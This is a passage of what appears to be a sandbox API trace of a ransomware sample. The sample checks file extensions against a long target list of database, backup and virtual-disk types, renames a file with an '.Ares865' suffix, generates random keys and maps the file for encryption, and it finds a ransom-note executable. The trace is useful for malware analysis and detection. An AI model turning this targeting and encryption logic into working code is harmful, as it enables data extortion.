lstrlenW (lpString=".dll") returned 4 [0089.331] lstrcmpiW (lpString1="folder.ico", lpString2=".dll") returned 1 [0089.331] lstrlenW (lpString=".lnk") returned 4 [0089.331] lstrcmpiW (lpString1="folder.ico", lpString2=".lnk") returned 1 [0089.331] lstrlenW (lpString=".ini") returned 4 [0089.331] lstrcmpiW (lpString1="folder.ico", lpString2=".ini") returned 1 [0089.331] lstrlenW (lpString=".sys") returned 4 [0089.331] lstrcmpiW (lpString1="folder.ico", lpString2=".sys") returned 1 [0089.331] lstrlenW (lpString="folder.ico") returned 10 [0089.331] lstrlenW (lpString="bak") returned 3 [0089.332] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0089.332] lstrlenW (lpString="ba_") returned 3 [0089.332] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0089.332] lstrlenW (lpString="dbb") returned 3 [0089.332] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0089.332] lstrlenW (lpString="vmdk") returned 4 [0089.332] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0089.332] lstrlenW (lpString="rar") returned 3 [0089.332] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0089.332] lstrlenW (lpString="zip") returned 3 [0089.332] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0089.332] lstrlenW (lpString="tgz") returned 3 [0089.332] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0089.332] lstrlenW (lpString="vbox") returned 4 [0089.332] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0089.332] lstrlenW (lpString="vdi") returned 3 [0089.332] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0089.332] lstrlenW (lpString="vhd") returned 3 [0089.332] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0089.332] lstrlenW (lpString="vhdx") returned 4 [0089.332] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0089.332] lstrlenW (lpString="avhd") returned 4 [0089.332] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0089.332] lstrlenW (lpString="db") returned 2 [0089.332] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0089.332] lstrlenW (lpString="db2") returned 3 [0089.332] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0089.332] lstrlenW (lpString="db3") returned 3 [0089.332] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0089.332] lstrlenW (lpString="dbf") returned 3 [0089.332] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0089.332] lstrlenW (lpString="mdf") returned 3 [0089.332] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0089.332] lstrlenW (lpString="mdb") returned 3 [0089.332] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0089.332] lstrlenW (lpString="sql") returned 3 [0089.332] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0089.332] lstrlenW (lpString="sqlite") returned 6 [0089.333] lstrcmpiW (lpString1="er.ico", lpString2="sqlite") returned -1 [0089.333] lstrlenW (lpString="sqlite3") returned 7 [0089.333] lstrcmpiW (lpString1="der.ico", lpString2="sqlite3") returned -1 [0089.333] lstrlenW (lpString="sqlitedb") returned 8 [0089.333] lstrcmpiW (lpString1="lder.ico", lpString2="sqlitedb") returned -1 [0089.333] lstrlenW (lpString="xml") returned 3 [0089.333] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0089.333] lstrlenW (lpString="$er") returned 3 [0089.333] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0089.333] lstrlenW (lpString="4dd") returned 3 [0089.333] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0089.333] lstrlenW (lpString="4dl") returned 3 [0089.333] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0089.333] lstrlenW (lpString="^^^") returned 3 [0089.333] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0089.333] lstrlenW (lpString="abs") returned 3 [0089.333] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0089.333] lstrlenW (lpString="abx") returned 3 [0089.333] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0089.333] lstrlenW (lpString="accdb") returned 5 [0089.333] lstrcmpiW (lpString1="r.ico", lpString2="accdb") returned 1 [0089.333] lstrlenW (lpString="accdc") returned 5 [0089.333] lstrcmpiW (lpString1="r.ico", lpString2="accdc") returned 1 [0089.333] lstrlenW (lpString="accde") returned 5 [0089.333] lstrcmpiW (lpString1="r.ico", lpString2="accde") returned 1 [0089.333] lstrlenW (lpString="accdr") returned 5 [0089.333] lstrcmpiW (lpString1="r.ico", lpString2="accdr") returned 1 [0089.333] lstrlenW (lpString="accdt") returned 5 [0089.333] lstrcmpiW (lpString1="r.ico", lpString2="accdt") returned 1 [0089.333] lstrlenW (lpString="accdw") returned 5 [0089.333] lstrcmpiW (lpString1="r.ico", lpString2="accdw") returned 1 [0089.333] lstrlenW (lpString="accft") returned 5 [0089.333] lstrcmpiW (lpString1="r.ico", lpString2="accft") returned 1 [0089.333] lstrlenW (lpString="adb") returned 3 [0089.333] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.333] lstrlenW (lpString="adb") returned 3 [0089.333] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.333] lstrlenW (lpString="ade") returned 3 [0089.334] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0089.334] lstrlenW (lpString="adf") returned 3 [0089.334] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0089.334] lstrlenW (lpString="adn") returned 3 [0089.334] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0089.334] lstrlenW (lpString="adp") returned 3 [0089.334] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0089.334] lstrlenW (lpString="alf") returned 3 [0089.334] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0089.334] lstrlenW (lpString="ask") returned 3 [0089.334] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0089.334] lstrlenW (lpString="btr") returned 3 [0089.334] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0089.334] lstrlenW (lpString="cat") returned 3 [0089.334] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0089.334] lstrlenW (lpString="cdb") returned 3 [0089.334] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0089.334] lstrlenW (lpString="ckp") returned 3 [0089.334] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0089.334] lstrlenW (lpString="cma") returned 3 [0089.334] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0089.334] lstrlenW (lpString="cpd") returned 3 [0089.334] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0089.334] lstrlenW (lpString="dacpac") returned 6 [0089.334] lstrcmpiW (lpString1="er.ico", lpString2="dacpac") returned 1 [0089.334] lstrlenW (lpString="dad") returned 3 [0089.334] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0089.334] lstrlenW (lpString="dadiagrams") returned 10 [0089.334] lstrlenW (lpString="daschema") returned 8 [0089.334] lstrcmpiW (lpString1="lder.ico", lpString2="daschema") returned 1 [0089.334] lstrlenW (lpString="db-journal") returned 10 [0089.334] lstrlenW (lpString="db-shm") returned 6 [0089.334] lstrcmpiW (lpString1="er.ico", lpString2="db-shm") returned 1 [0089.334] lstrlenW (lpString="db-wal") returned 6 [0089.334] lstrcmpiW (lpString1="er.ico", lpString2="db-wal") returned 1 [0089.334] lstrlenW (lpString="dbc") returned 3 [0089.334] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0089.334] lstrlenW (lpString="dbs") returned 3 [0089.335] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0089.335] lstrlenW (lpString="dbt") returned 3 [0089.335] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0089.335] lstrlenW (lpString="dbv") returned 3 [0089.335] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0089.335] lstrlenW (lpString="dbx") returned 3 [0089.335] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0089.335] lstrlenW (lpString="dcb") returned 3 [0089.335] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0089.335] lstrlenW (lpString="dct") returned 3 [0089.335] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0089.335] lstrlenW (lpString="dcx") returned 3 [0089.335] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0089.335] lstrlenW (lpString="ddl") returned 3 [0089.335] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0089.335] lstrlenW (lpString="dlis") returned 4 [0089.335] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0089.335] lstrlenW (lpString="dp1") returned 3 [0089.335] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0089.335] lstrlenW (lpString="dqy") returned 3 [0089.335] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0089.335] lstrlenW (lpString="dsk") returned 3 [0089.335] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0089.335] lstrlenW (lpString="dsn") returned 3 [0089.335] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0089.335] lstrlenW (lpString="dtsx") returned 4 [0089.335] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0089.335] lstrlenW (lpString="dxl") returned 3 [0089.335] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0089.335] lstrlenW (lpString="eco") returned 3 [0089.335] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0089.335] lstrlenW (lpString="ecx") returned 3 [0089.336] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0089.336] lstrlenW (lpString="edb") returned 3 [0089.336] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0089.336] lstrlenW (lpString="epim") returned 4 [0089.336] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0089.336] lstrlenW (lpString="fcd") returned 3 [0089.336] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0089.336] lstrlenW (lpString="fdb") returned 3 [0089.336] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0089.336] lstrlenW (lpString="fic") returned 3 [0089.336] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0089.336] lstrlenW (lpString="flexolibrary") returned 12 [0089.336] lstrlenW (lpString="fm5") returned 3 [0089.336] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0089.336] lstrlenW (lpString="fmp") returned 3 [0089.336] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0089.336] lstrlenW (lpString="fmp12") returned 5 [0089.336] lstrcmpiW (lpString1="r.ico", lpString2="fmp12") returned 1 [0089.336] lstrlenW (lpString="fmpsl") returned 5 [0089.336] lstrcmpiW (lpString1="r.ico", lpString2="fmpsl") returned 1 [0089.336] lstrlenW (lpString="fol") returned 3 [0089.336] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0089.336] lstrlenW (lpString="fp3") returned 3 [0089.336] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0089.336] lstrlenW (lpString="fp4") returned 3 [0089.336] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0089.336] lstrlenW (lpString="fp5") returned 3 [0089.336] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0089.336] lstrlenW (lpString="fp7") returned 3 [0089.336] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0089.336] lstrlenW (lpString="fpt") returned 3 [0089.336] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0089.336] lstrlenW (lpString="frm") returned 3 [0089.336] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0089.336] lstrlenW (lpString="gdb") returned 3 [0089.336] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.336] lstrlenW (lpString="gdb") returned 3 [0089.336] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.337] lstrlenW (lpString="grdb") returned 4 [0089.337] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0089.337] lstrlenW (lpString="gwi") returned 3 [0089.337] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0089.337] lstrlenW (lpString="hdb") returned 3 [0089.337] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0089.337] lstrlenW (lpString="his") returned 3 [0089.337] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0089.337] lstrlenW (lpString="ib") returned 2 [0089.337] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0089.337] lstrlenW (lpString="idb") returned 3 [0089.337] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0089.337] lstrlenW (lpString="ihx") returned 3 [0089.337] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0089.337] lstrlenW (lpString="itdb") returned 4 [0089.337] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0089.337] lstrlenW (lpString="itw") returned 3 [0089.337] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0089.337] lstrlenW (lpString="jet") returned 3 [0089.337] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0089.337] lstrlenW (lpString="jtx") returned 3 [0089.337] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0089.337] lstrlenW (lpString="kdb") returned 3 [0089.337] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0089.337] lstrlenW (lpString="kexi") returned 4 [0089.337] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0089.337] lstrlenW (lpString="kexic") returned 5 [0089.337] lstrcmpiW (lpString1="r.ico", lpString2="kexic") returned 1 [0089.337] lstrlenW (lpString="kexis") returned 5 [0089.337] lstrcmpiW (lpString1="r.ico", lpString2="kexis") returned 1 [0089.337] lstrlenW (lpString="lgc") returned 3 [0089.337] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0089.337] lstrlenW (lpString="lwx") returned 3 [0089.337] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0089.337] lstrlenW (lpString="maf") returned 3 [0089.337] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0089.337] lstrlenW (lpString="maq") returned 3 [0089.337] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0089.338] lstrlenW (lpString="mar") returned 3 [0089.338] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0089.338] lstrlenW (lpString="marshal") returned 7 [0089.338] lstrcmpiW (lpString1="der.ico", lpString2="marshal") returned -1 [0089.338] lstrlenW (lpString="mas") returned 3 [0089.338] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0089.338] lstrlenW (lpString="mav") returned 3 [0089.338] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0089.338] lstrlenW (lpString="maw") returned 3 [0089.338] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0089.338] lstrlenW (lpString="mdbhtml") returned 7 [0089.338] lstrcmpiW (lpString1="der.ico", lpString2="mdbhtml") returned -1 [0089.338] lstrlenW (lpString="mdn") returned 3 [0089.338] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0089.338] lstrlenW (lpString="mdt") returned 3 [0089.338] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0089.338] lstrlenW (lpString="mfd") returned 3 [0089.338] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0089.338] lstrlenW (lpString="mpd") returned 3 [0089.338] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0089.338] lstrlenW (lpString="mrg") returned 3 [0089.338] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0089.338] lstrlenW (lpString="mud") returned 3 [0089.338] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0089.338] lstrlenW (lpString="mwb") returned 3 [0089.338] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0089.338] lstrlenW (lpString="myd") returned 3 [0089.338] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0089.338] lstrlenW (lpString="ndf") returned 3 [0089.338] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0089.338] lstrlenW (lpString="nnt") returned 3 [0089.338] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0089.338] lstrlenW (lpString="nrmlib") returned 6 [0089.338] lstrcmpiW (lpString1="er.ico", lpString2="nrmlib") returned -1 [0089.338] lstrlenW (lpString="ns2") returned 3 [0089.338] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0089.338] lstrlenW (lpString="ns3") returned 3 [0089.338] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0089.339] lstrlenW (lpString="ns4") returned 3 [0089.339] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0089.339] lstrlenW (lpString="nsf") returned 3 [0089.339] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 [0089.339] lstrlenW (lpString="nv") returned 2 [0089.339] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0089.339] lstrlenW (lpString="nv2") returned 3 [0089.339] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0089.339] lstrlenW (lpString="nwdb") returned 4 [0089.339] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0089.339] lstrlenW (lpString="nyf") returned 3 [0089.339] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0089.339] lstrlenW (lpString="odb") returned 3 [0089.339] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.339] lstrlenW (lpString="odb") returned 3 [0089.339] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.339] lstrlenW (lpString="oqy") returned 3 [0089.339] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0089.339] lstrlenW (lpString="ora") returned 3 [0089.339] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0089.339] lstrlenW (lpString="orx") returned 3 [0089.339] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0089.339] lstrlenW (lpString="owc") returned 3 [0089.339] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0089.339] lstrlenW (lpString="p96") returned 3 [0089.339] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0089.339] lstrlenW (lpString="p97") returned 3 [0089.339] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0089.339] lstrlenW (lpString="pan") returned 3 [0089.339] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0089.339] lstrlenW (lpString="pdb") returned 3 [0089.339] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0089.339] lstrlenW (lpString="pdm") returned 3 [0089.339] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0089.339] lstrlenW (lpString="pnz") returned 3 [0089.339] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0089.339] lstrlenW (lpString="qry") returned 3 [0089.339] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0089.339] lstrlenW (lpString="qvd") returned 3 [0089.340] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0089.340] lstrlenW (lpString="rbf") returned 3 [0089.340] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0089.340] lstrlenW (lpString="rctd") returned 4 [0089.340] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0089.340] lstrlenW (lpString="rod") returned 3 [0089.340] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0089.340] lstrlenW (lpString="rodx") returned 4 [0089.340] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0089.340] lstrlenW (lpString="rpd") returned 3 [0089.340] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0089.340] lstrlenW (lpString="rsd") returned 3 [0089.340] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0089.340] lstrlenW (lpString="sas7bdat") returned 8 [0089.340] lstrcmpiW (lpString1="lder.ico", lpString2="sas7bdat") returned -1 [0089.340] lstrlenW (lpString="sbf") returned 3 [0089.340] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0089.340] lstrlenW (lpString="scx") returned 3 [0089.340] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0089.340] lstrlenW (lpString="sdb") returned 3 [0089.340] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0089.340] lstrlenW (lpString="sdc") returned 3 [0089.340] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0089.340] lstrlenW (lpString="sdf") returned 3 [0089.340] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0089.340] lstrlenW (lpString="sis") returned 3 [0089.340] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0089.340] lstrlenW (lpString="spq") returned 3 [0089.340] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0089.340] lstrlenW (lpString="te") returned 2 [0089.340] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0089.340] lstrlenW (lpString="teacher") returned 7 [0089.340] lstrcmpiW (lpString1="der.ico", lpString2="teacher") returned -1 [0089.340] lstrlenW (lpString="tmd") returned 3 [0089.340] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0089.340] lstrlenW (lpString="tps") returned 3 [0089.340] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0089.340] lstrlenW (lpString="trc") returned 3 [0089.341] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.341] lstrlenW (lpString="trc") returned 3 [0089.341] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.341] lstrlenW (lpString="trm") returned 3 [0089.341] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0089.341] lstrlenW (lpString="udb") returned 3 [0089.341] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0089.341] lstrlenW (lpString="udl") returned 3 [0089.341] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0089.341] lstrlenW (lpString="usr") returned 3 [0089.341] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0089.341] lstrlenW (lpString="v12") returned 3 [0089.341] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0089.341] lstrlenW (lpString="vis") returned 3 [0089.341] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0089.341] lstrlenW (lpString="vpd") returned 3 [0089.341] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0089.341] lstrlenW (lpString="vvv") returned 3 [0089.341] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0089.341] lstrlenW (lpString="wdb") returned 3 [0089.341] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0089.341] lstrlenW (lpString="wmdb") returned 4 [0089.341] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0089.341] lstrlenW (lpString="wrk") returned 3 [0089.341] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0089.341] lstrlenW (lpString="xdb") returned 3 [0089.341] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0089.341] lstrlenW (lpString="xld") returned 3 [0089.341] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0089.341] lstrlenW (lpString="xmlff") returned 5 [0089.341] lstrcmpiW (lpString1="r.ico", lpString2="xmlff") returned -1 [0089.341] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.Ares865") returned 104 [0089.341] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.ares865"), dwFlags=0x1) returned 1 [0089.342] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.343] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=53411) returned 1 [0089.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.343] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.344] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.344] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.344] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd3b0, lpName=0x0) returned 0x15c [0089.345] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd3b0) returned 0x190000 [0089.349] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.349] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.349] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.349] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.349] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.349] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.349] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.349] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.349] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.350] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0089.350] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.350] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0089.350] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.350] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.350] CloseHandle (hObject=0x15c) returned 1 [0089.350] CloseHandle (hObject=0x118) returned 1 [0089.351] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.351] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.351] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.357] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c7d8980, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c7d8980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.357] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.357] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2db04ce, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2db04ce, ftLastAccessTime.dwHighDateTime=0x1ca0407, 